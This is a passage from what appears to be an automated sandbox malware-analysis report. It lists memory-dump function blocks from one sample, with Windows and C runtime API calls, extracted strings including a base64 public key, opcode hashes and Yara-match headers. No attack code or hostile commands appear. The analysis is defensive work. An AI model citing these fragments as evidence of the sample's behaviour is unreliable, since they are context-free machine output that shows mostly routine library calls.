                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID: char $int $long $short $unsigned
                                • API String ID: 2943138195-3894466517
                                • Opcode ID: d1a279a1c9918df5548dcf52195b07f08cd47688db1b491f31784bfd47c55495
                                • Instruction ID: eedc43ed97b8cbba10b34f539caf0808486b44d3ddee2306af81fb5e5772d53c
                                • Opcode Fuzzy Hash: d1a279a1c9918df5548dcf52195b07f08cd47688db1b491f31784bfd47c55495
                                • Instruction Fuzzy Hash: BB315872B24B99C9EB11CF68E8813ED3BB2B328748F844116CB485775CEB78C196C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                • String ID: CONOUT$
                                • API String ID: 3230265001-3130406586
                                • Opcode ID: 7cdf3afde5ecbc352834f34f496f379e4a68146d0cdc74b782376807603147f1
                                • Instruction ID: fa2cbf5aeeb57a8a9f7d09a780890d689119873c70228af3ad798c18455d9ab6
                                • Opcode Fuzzy Hash: 7cdf3afde5ecbc352834f34f496f379e4a68146d0cdc74b782376807603147f1
                                • Instruction Fuzzy Hash: 67118C31320A408BE7109F96E854359B7A0F798FE4F444224EE5D87BA4DF7CC469C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 01233F19
                                • _invalid_parameter_noinfo.LIBCMT ref: 0123435A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                • API String ID: 3215553584-1196891531
                                • Opcode ID: cf6c7c89e3c099f808c38c0d558e7864914a74c22f24bdaff9b37e4c5ed08d00
                                • Instruction ID: 08c9eee61b1c60b948f7ece8db7a4454da87be1ef1370ad556aa7e45278f312e
                                • Opcode Fuzzy Hash: cf6c7c89e3c099f808c38c0d558e7864914a74c22f24bdaff9b37e4c5ed08d00
                                • Instruction Fuzzy Hash: 46D111B26346C286FB29EF2DD15037DAFA0FBD1788F884095CB8A67324D7B9C5518301
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011AE58D
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011AE5B2
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011AE5DD
                                • std::_Facet_Register.LIBCPMT ref: 011AE655
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011AE678
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011AE6A2
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                • String ID:
                                • API String ID: 2081738530-0
                                • Opcode ID: 9e0712533cd80a90921f8712a73b6aba312c84a0851b43df1726c53e05d1b1fa
                                • Instruction ID: 68e4cdb866fb65d4235c8aaaf39d682164862be248b205afb81db2c3112516a5
                                • Opcode Fuzzy Hash: 9e0712533cd80a90921f8712a73b6aba312c84a0851b43df1726c53e05d1b1fa
                                • Instruction Fuzzy Hash: 5031A136605F4082EB19DF19F44036ABBA1FB98BE8F884625DB8D47768DF38C191C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011AC50D
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011AC532
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011AC55D
                                • std::_Facet_Register.LIBCPMT ref: 011AC5D5
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011AC5F8
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011AC622
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                • String ID:
                                • API String ID: 2081738530-0
                                • Opcode ID: dcb5bbde9c1dcdfcb2c8bb85d40369a682a1d2c96372b449f3b6d2683d19097a
                                • Instruction ID: b3274e37a81b3e47c108fe3ed9cd2dcbadfa2e2da08d05e521367d06adb48084
                                • Opcode Fuzzy Hash: dcb5bbde9c1dcdfcb2c8bb85d40369a682a1d2c96372b449f3b6d2683d19097a
                                • Instruction Fuzzy Hash: 2A319036304F4182EB19DF19E44035A7BA1FB98BE8F884625EB8E47768DF38C151C741
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 012358DC: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,01235C00,?,?,?,?,00000000,COMSPEC,?,01235E9E), ref: 01235906
                                • IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,01235CB3,?,?,?,?,00000000,COMSPEC,?,01235E9E), ref: 01235F33
                                • GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,01235CB3,?,?,?,?,00000000,COMSPEC,?,01235E9E), ref: 01235F7F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: CodeInfoPageValid
                                • String ID: XvM$hrM$xrM
                                • API String ID: 546120528-1045095878
                                • Opcode ID: a66c2686150bac2452d8a396e7b513d06a22a8e3b9f7d05a6f77c7a7cdd27b09
                                • Instruction ID: ec81c2d4236d5ae1d039279c9b363ed63e301d1b3a278807665e7a2d0b714147
                                • Opcode Fuzzy Hash: a66c2686150bac2452d8a396e7b513d06a22a8e3b9f7d05a6f77c7a7cdd27b09
                                • Instruction Fuzzy Hash: 2A7100F3728681A6EB368F29E451379BBB5F3C1B80F488116CB8A47751EB79D251C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 012196E4
                                  • Part of subcall function 01216A94: DName::operator+.LIBVCRUNTIME ref: 01216F41
                                  • Part of subcall function 01216A94: DName::operator+.LIBVCRUNTIME ref: 01216F79
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                • API String ID: 2943138195-757766384
                                • Opcode ID: 32f45db0cdd78b05164bd053a4a1fdbf76323c42d71ac744cb6ca79b41bc03d9
                                • Instruction ID: 371fbf890d92ad5704f8f365cc98553ee2d5e4212cf3a32f989ab0614cf337a4
                                • Opcode Fuzzy Hash: 32f45db0cdd78b05164bd053a4a1fdbf76323c42d71ac744cb6ca79b41bc03d9
                                • Instruction Fuzzy Hash: AD5194B2624B8188EF18DF29D9A03BD7BB5BB25788F944525CF4917B1CDB78C2A4C350
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: NameName::
                                • String ID: `template-parameter$void
                                • API String ID: 1333004437-4057429177
                                • Opcode ID: 91babb5d7cf3d98260af75e4956d97bcfc87fb214389b92a8e77e3f56d6f4e28
                                • Instruction ID: 2fcfcacb2b053b8b5fe994d0ff1b15daf884ec4b2ec962442b3a493454fb7606
                                • Opcode Fuzzy Hash: 91babb5d7cf3d98260af75e4956d97bcfc87fb214389b92a8e77e3f56d6f4e28
                                • Instruction Fuzzy Hash: 74415B72B20B9589FB01DBA5D8903ED27B1BB68B88F950125CF0D6BB18EFB8C115C340
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 0122E721
                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,0122E69F,?,?,FFFFFFFE,0122BE82), ref: 0122E7E0
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,0122E69F,?,?,FFFFFFFE,0122BE82), ref: 0122E860
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 2210144848-0
                                • Opcode ID: 41f5b201765fd1012e75b33989042ad9eb854817b3704a71d157bc4193b57057
                                • Instruction ID: de130aa20feade57a8cc63dd5562ebff6d1627f1bed9f7c93223d9cf5e6bdb9a
                                • Opcode Fuzzy Hash: 41f5b201765fd1012e75b33989042ad9eb854817b3704a71d157bc4193b57057
                                • Instruction Fuzzy Hash: C1714232730B66A9EB15DFA9D8803BD7B60FB98B88F860216CF4A53725DB78C041D311
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: NameName::$Name::operator+
                                • String ID:
                                • API String ID: 826178784-0
                                • Opcode ID: 29923c674b2fa95aa2aba20c2aa403fe3cbc07dd25e124c305e97dc0e637c71e
                                • Instruction ID: 1bb799bf120a9e9069ec33b6e05b90fdf808138f84bc7a453d63a3a670ed209a
                                • Opcode Fuzzy Hash: 29923c674b2fa95aa2aba20c2aa403fe3cbc07dd25e124c305e97dc0e637c71e
                                • Instruction Fuzzy Hash: D8316936725A9589EB10CF25E8903A83BF4FBA9B80FA84026CB4D53758EB34C965C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 0121D6C8
                                • CreateThread.KERNEL32(?,?,?,?,00000000,011AD798), ref: 0121D709
                                • GetLastError.KERNEL32(?,?,?,?,00000000,011AD798), ref: 0121D717
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,011AD798), ref: 0121D734
                                • FreeLibrary.KERNEL32(?,?,?,?,00000000,011AD798), ref: 0121D743
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 2067211477-0
                                • Opcode ID: f7c2629d237504ee00307db0952ac3ca8b230ce5b89be6aa7cf7d41c1f6d7cfa
                                • Instruction ID: 61a7a1898ad01fff8ba77130b607e202f78763a7bc6959b0837ef5869a16390a
                                • Opcode Fuzzy Hash: f7c2629d237504ee00307db0952ac3ca8b230ce5b89be6aa7cf7d41c1f6d7cfa
                                • Instruction Fuzzy Hash: 8B116D3531578AC6EE19DFA5A45836AA7A0AFA4BC4F084925DF4D43B18DF3CC016C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _Wcsftime.LIBCMT ref: 011D8F75
                                • _Wcsftime.LIBCMT ref: 011D907F
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011D916F
                                  • Part of subcall function 01210818: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,011EFCD6), ref: 0121085C
                                  • Part of subcall function 01210818: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,011EFCD6), ref: 012108A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Wcsftime$ExceptionFileHeaderRaise_invalid_parameter_noinfo_noreturn
                                • String ID: StringNarrow: wcstombs_s() call failed with error
                                • API String ID: 405629397-1818402112
                                • Opcode ID: 6d86fefc0909645b17f72b84db89fbc4401fbeb7c5c1c8a080f8e40f23c703af
                                • Instruction ID: c63d8e132deda146ee0b097dd435453564798c03c35a092ac01c8b8fd321539e
                                • Opcode Fuzzy Hash: 6d86fefc0909645b17f72b84db89fbc4401fbeb7c5c1c8a080f8e40f23c703af
                                • Instruction Fuzzy Hash: 5471BB22724A8485EB04DB79E44039E6B72F7957E8F905216EF9E03BA9DF38C194C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AA597
                                Strings
                                • MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 011AA5A6
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn
                                • String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
                                • API String ID: 3668304517-3729741635
                                • Opcode ID: 706c8e693cba59f541baedaca1c91eef85d0e4cb6b55966f598d7c30ce4ce79c
                                • Instruction ID: 1eec700e783b0651d1a430a5f41b436151031e9070eab25291bf127ae49cfeab
                                • Opcode Fuzzy Hash: 706c8e693cba59f541baedaca1c91eef85d0e4cb6b55966f598d7c30ce4ce79c
                                • Instruction Fuzzy Hash: 36411466301A8445EE1DDB2AF51036C6B61EB49FE8F984621DF6D0BB98DF78C4D2C704
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 0121E89A
                                • _invalid_parameter_noinfo.LIBCMT ref: 0121EA6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: $*
                                • API String ID: 3215553584-3982473090
                                • Opcode ID: 33ec76c748f4584fd0d079eac827ca36f07aad56625ba6ecbdc9d4f7aa4ad00a
                                • Instruction ID: a5ad0a37838a168ca52d78ed5009e54d0572795b4e23d9573553bd04347ce54e
                                • Opcode Fuzzy Hash: 33ec76c748f4584fd0d079eac827ca36f07aad56625ba6ecbdc9d4f7aa4ad00a
                                • Instruction Fuzzy Hash: B3519A73534255CAEB6BCF3C985513C3BE2F32AB48B1A222ADF861221CCB70C481CB45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 0121E674
                                • _invalid_parameter_noinfo.LIBCMT ref: 0121E6A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: $*
                                • API String ID: 3215553584-3982473090
                                • Opcode ID: c6c9c061b1768f874f9c6133d41adbe09ad627b3d4356e9e55a6ed23d6b03380
                                • Instruction ID: 988b29f04579311246ac3b60114f5b4209b7a99b7d4c45ee431fcec89960ca1b
                                • Opcode Fuzzy Hash: c6c9c061b1768f874f9c6133d41adbe09ad627b3d4356e9e55a6ed23d6b03380
                                • Instruction Fuzzy Hash: 0F515B725342568AE72BCF38895937D3BE1F326B1CF5A261ADF42422ACCB74C482C755
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 011AE3D0: Concurrency::cancel_current_task.LIBCPMT ref: 011AE550
                                  • Part of subcall function 011AE3D0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AE556
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011D40FF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                • String ID: :@$6$: Nonblocking input is not implemented by this object.
                                • API String ID: 3936042273-2502767172
                                • Opcode ID: ef7ea82288fbc676d8744d3e77d57961c67e2a8879797bf52f9a598264506279
                                • Instruction ID: 02720b70eb6114f719a8d47d60d80b2fd52c49402cc93f7dd3cba24fdb504173
                                • Opcode Fuzzy Hash: ef7ea82288fbc676d8744d3e77d57961c67e2a8879797bf52f9a598264506279
                                • Instruction Fuzzy Hash: A241AD72318B8482EB14CF15E49439EB761F799BD4F944222EB9C03B58EBB9C5A4CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 01219E38: DName::operator+.LIBVCRUNTIME ref: 01219EC9
                                  • Part of subcall function 01219E38: DName::operator+.LIBVCRUNTIME ref: 01219F02
                                  • Part of subcall function 01219E38: DName::operator+.LIBVCRUNTIME ref: 0121A22B
                                • DName::operator+.LIBVCRUNTIME ref: 01217C1D
                                • DName::operator+.LIBVCRUNTIME ref: 01217C7C
                                • DName::operator+.LIBVCRUNTIME ref: 01217CAE
                                • DName::operator+.LIBVCRUNTIME ref: 01217CBE
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID:
                                • API String ID: 2943138195-0
                                • Opcode ID: 44068ef960f4e063ba2730a05d17af6ddab831af528dc2c8cb82679dd7d1cd7c
                                • Instruction ID: 3ae7cef4482d82075357308d31f9c90685997ea8cdc12d31c04f50c652b9463b
                                • Opcode Fuzzy Hash: 44068ef960f4e063ba2730a05d17af6ddab831af528dc2c8cb82679dd7d1cd7c
                                • Instruction Fuzzy Hash: 36815D73A24B958AFB11DFA4D8403EC3BB1F7A4758F948016CF4927758EBB88595C780
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __std_exception_copy.LIBVCRUNTIME ref: 01181F3F
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01181FD4
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01181FDA
                                • __std_exception_destroy.LIBVCRUNTIME ref: 01182002
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                • String ID:
                                • API String ID: 2138705365-0
                                • Opcode ID: 578c17e4bb2c48626a18dc8cf3a7b54abf02eda89cd9b8189ac90e9ddf6802af
                                • Instruction ID: e06bfa470dd2c868dd3d7950b190f4393f492bd74338e22a1f88c0e47ffcfc7d
                                • Opcode Fuzzy Hash: 578c17e4bb2c48626a18dc8cf3a7b54abf02eda89cd9b8189ac90e9ddf6802af
                                • Instruction Fuzzy Hash: B1616832B04B808AEB14DFA9E44039C77B2E759B98F408625DF5C17B98EF78D1A5C344
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::DName.LIBVCRUNTIME ref: 012182ED
                                • DName::operator+.LIBVCRUNTIME ref: 012182FD
                                • DName::operator+.LIBVCRUNTIME ref: 0121831A
                                • DName::operator+.LIBVCRUNTIME ref: 0121834F
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+$NameName::
                                • String ID:
                                • API String ID: 168861036-0
                                • Opcode ID: 8f476b40017e9bf3161fcc91ceddca790edfd64415f9d66b7aa264f9cf7a64ec
                                • Instruction ID: 8c0e41bc4e315ca29525a0663486c76a80e4badac3b04f77561b54afab0e481d
                                • Opcode Fuzzy Hash: 8f476b40017e9bf3161fcc91ceddca790edfd64415f9d66b7aa264f9cf7a64ec
                                • Instruction Fuzzy Hash: DB51BD72A34A9589EB11CF64F8C07AD3BF1F7A5B48FA88011CB0A47768DB79C195C741
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011D3DB3
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011D3DB9
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011D3DF8
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011D3E3C
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                • String ID:
                                • API String ID: 3936042273-0
                                • Opcode ID: 3e071b32b3f0ad9ff5dd354f20bae162560adf66c5fa572d6bb8409362eb63f0
                                • Instruction ID: 7970477e55b145b544d5b94ce289e1aa7681d8b2e626096feda089ddf0b369ab
                                • Opcode Fuzzy Hash: 3e071b32b3f0ad9ff5dd354f20bae162560adf66c5fa572d6bb8409362eb63f0
                                • Instruction Fuzzy Hash: 45412FB2721A8582DE0CCB2AD45431D67A1FB49BE0F844222DF7D07B98DF7CD0928702
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 01219E38: DName::operator+.LIBVCRUNTIME ref: 01219EC9
                                  • Part of subcall function 01219E38: DName::operator+.LIBVCRUNTIME ref: 01219F02
                                  • Part of subcall function 01219E38: DName::operator+.LIBVCRUNTIME ref: 0121A22B
                                • DName::operator+.LIBVCRUNTIME ref: 0121A367
                                • DName::operator+.LIBVCRUNTIME ref: 0121A376
                                • DName::operator+.LIBVCRUNTIME ref: 0121A3F2
                                • DName::operator+.LIBVCRUNTIME ref: 0121A401
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
